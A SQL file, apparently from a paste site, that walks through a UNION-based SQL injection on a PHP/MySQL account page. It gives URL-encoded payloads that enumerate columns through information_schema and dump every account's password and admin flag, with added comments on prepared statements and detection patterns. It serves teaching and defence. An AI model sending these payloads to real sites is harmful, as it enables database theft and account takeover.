/other/

SQL injection stuff - MySQL

2016-11-22 23:33:51


-- Worked example of a UNION-based SQL injection against a MySQL-backed PHP page whose
-- `username` query parameter is concatenated into a SELECT unescaped. Read it as a
-- defender: every step below works only because of that one concatenation, and all of
-- it is closed off by a prepared statement with a bound parameter (with hashed passwords
-- and a least-privileged database account as defence in depth).

-- original url
-- www.your_page.com/account.php?username=xxx

-- sql injection test
-- www.your_page.com/account.php?username=xxx'
-- NOTE(review): the lone quote is the probe. It has any effect only because the page
-- splices the raw `username` value into the SQL text (see the original query below); a
-- database error or a changed page on this request is the signal that input reaches the
-- query unescaped. With a bound parameter the quote is just data.

-- original query
SELECT username, mysignature FROM accounts WHERE username = 'xxx';
-- The application's intended statement. It selects exactly two columns, which is what
-- fixes the column count every injected UNION below has to match.

-- we are guessing that we have password column in accounts table

SELECT username, mysignature FROM accounts WHERE username = 'xxx' UNION SELECT username, password FROM accounts; -- ';
-- The trailing `-- ` comments out the application's own closing quote (MySQL only
-- treats `--` as a comment when it is followed by whitespace). This line also shows
-- why passwords must never be stored readable: one UNION exposes the whole column.

-- url format
-- (not executable SQL: the same statement with spaces URL-encoded as %20, kept only to
-- show what the parameter looks like on the wire; the other "url format" lines below
-- are the same kind of illustration)
SELECT username, mysignature FROM accounts WHERE username = 'xxx'%20UNION%20SELECT%20username,password%20FROM%20accounts;%20--%20';

-- sql injection test 2
-- www.your_page.com/account.php?username=xxx'%20UNION%20SELECT%20username,password%20FROM%20accounts;%20--%20
-- if it works ... well
-- Detection note: `UNION SELECT` and `information_schema` inside a query-string value
-- have no legitimate reason to appear in a username parameter; they are high-signal
-- patterns for request logging and WAF rules.

-- no more guessing, we have to check the column list for accounts table

-- check main db name
SELECT DATABASE(),DATABASE();
-- DATABASE() is selected twice purely to match the two columns of the original SELECT;
-- UNION requires both sides to have the same column count.
-- sql that we want to execute
SELECT username, mysignature FROM accounts WHERE username = 'xxx' UNION SELECT DATABASE(),DATABASE() -- ';
-- url format
SELECT username, mysignature FROM accounts WHERE username = 'xxx'%20UNION%20SELECT%20DATABASE(),DATABASE()%20--%20';
-- url
--  www.your_page.com/account.php?username=xxx'%20UNION%20SELECT%20DATABASE(),DATABASE()%20--%20';
--
--
-- get list of columns for table
SELECT column_name,column_name FROM information_schema.columns WHERE table_name='accounts';
-- table_name is not qualified with table_schema, so on a server with several databases
-- this also returns columns of any other table named accounts. The metadata lookup runs
-- with whatever privileges the application's database account holds, which is one reason
-- that account should be limited to the tables and columns the page actually needs.
-- sql that we want to execute
SELECT username, mysignature FROM accounts WHERE username = 'xxx' UNION SELECT column_name,column_name FROM information_schema.columns WHERE table_name='accounts'; -- ';
-- url format
SELECT username, mysignature FROM accounts WHERE username = 'xxx'%20UNION%20SELECT%20column_name,column_name%20FROM%20information_schema.columns%20WHERE%20table_name='accounts';%20--%20';
-- url
--  www.your_page.com/account.php?username=xxx'%20UNION%20SELECT%20column_name,column_name%20FROM%20information_schema.columns%20WHERE%20table_name='accounts';%20--%20';
--
-- get all accounts data in two column
SELECT group_concat(concat(cid,'-',username,'-',password,'-',mysignature,'-',is_admin,'-',firstname,'-',lastname) SEPARATOR '/'), null  FROM accounts;
-- group_concat folds every row into a single value so the whole table fits the page's
-- one-row display; `null` is the filler that makes up the second column. The password
-- and is_admin columns are read in the clear here, which is exactly the impact that a
-- hashed password column and a bound parameter would have prevented.
-- sql that we want to execute
-- (unlike the statements above, this one has no trailing `-- '` after the `;`; the url
-- line at the end of the file does include it)
SELECT username, mysignature FROM accounts WHERE username = 'xxx' UNION SELECT group_concat(concat(cid,'-',username,'-',password,'-',mysignature,'-',is_admin,'-',firstname,'-',lastname) SEPARATOR '/'), null  FROM accounts;
-- url format
SELECT username, mysignature FROM accounts WHERE username = 'xxx'%20UNION%20SELECT%20group_concat(concat(cid,'-',username,'-',password,'-',mysignature,'-',is_admin,'-',firstname,'-',lastname)%20SEPARATOR%20'/'),%20null%20FROM%20accounts;
-- url
--  www.your_page.com/account.php?username=xxx'%20UNION%20SELECT%20group_concat(concat(cid,'-',username,'-',password,'-',mysignature,'-',is_admin,'-',firstname,'-',lastname)%20SEPARATOR%20'/'),%20null%20FROM%20accounts;%20--%20